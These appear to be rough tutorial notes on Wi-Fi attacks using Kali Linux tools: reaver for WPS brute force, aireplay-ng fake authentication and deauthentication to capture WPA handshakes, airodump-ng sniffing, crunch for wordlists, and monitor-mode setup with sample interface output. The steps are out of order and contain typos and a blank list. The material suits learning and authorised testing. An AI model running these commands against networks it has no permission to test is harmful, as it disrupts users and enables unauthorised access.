we will use a program named wash
root@kali:~# wash -i wlan0
where wlan0 is the wireless network interface
root@kali:~# aireplay-ng –fakeauth 30 -a E4:8F:34:37:BA:0C -h 7C:8B:CA:1B:D8:31 wlan0
root@kali:~# reaver –bssid E4:8F:34:37:BA:0C –channel 2 –interface wlan0 -vvv –no-associate
deauthentication to intercept the handshake:
root@kali:~# aireplay-ng –deauth 4 -a E4:8F:34:37:BA:0C -c 80:35:C1:52:D8:E3 wlan0
crunch 6 11
With a wireless adapter in monitor mode you are able to sniff packet in the air:
at least the one in our range
even if we are not connected to that network
even if it’s not directed to our PC
To do this we need airodump-ng command, part of the aircrack-ng suite.
It a program design to capture packet with a wireless adapter in monitor mode
Ex:
root@kali:~# airodump-ng wlan0
By default the airodum-ng shows only 2.4Ghz network frequency.
To get 5Ghz wireless frequency add –band a parameter, like this:
root@kali:~# airodump-ng --band a wlan0
Hte main bands are:
It’s possible to use more than one basnds in the command line. The following command will show both 2.4Ghz and 5Ghz wireless:
root@kali:~# airodump-ng --band abg wlan0
Save sniffed data into a file:
root@kali:~# airodump-ng --bssid E4:8F:34:37:BA:0C --channel 2 --write test wlan0
In this case we write into the “test” file all packets sniffed from network whic mac address is E4:8F:34:37:BA:0C and channel 2.
the encrypted data sent to and from that target network are saved into the “cap” file
Get the wireless id
iwconfig
put it down
ifconfig wlan0 down
to kill any process that could interfere with using our interface (not mandatory)
airmon-ng check kill
Enable monitor mode
iwconfig wlan0 mode monitor
put wireless netowrk up again
ifconfig wlan0 up
ifconfig, show all network interfaces
Ex.
root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.160.128 netmask 255.255.255.0 broadcast 192.168.160.255
inet6 fe80::20c:29ff:feae:2778 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:ae:27:78 txqueuelen 1000 (Ethernet)
RX packets 53526 bytes 79273540 (75.6 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18397 bytes 1117190 (1.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 97 bytes 7040 (6.8 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 97 bytes 7040 (6.8 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 2312
ether ba:d7:b2:b4:4d:a8 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
iwconfig, show only all wireless network interfaces
Ex.
root@kali:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 unassociated Nickname:”<WIFI@REALTEK>”
Mode:Auto Frequency=2.412 GHz Access Point: Not-Associated
Sensitivity:0/0
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/100 Signal level=0 dBm Noise level=0 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
The most interesting thing of iwconfig command is the Mode.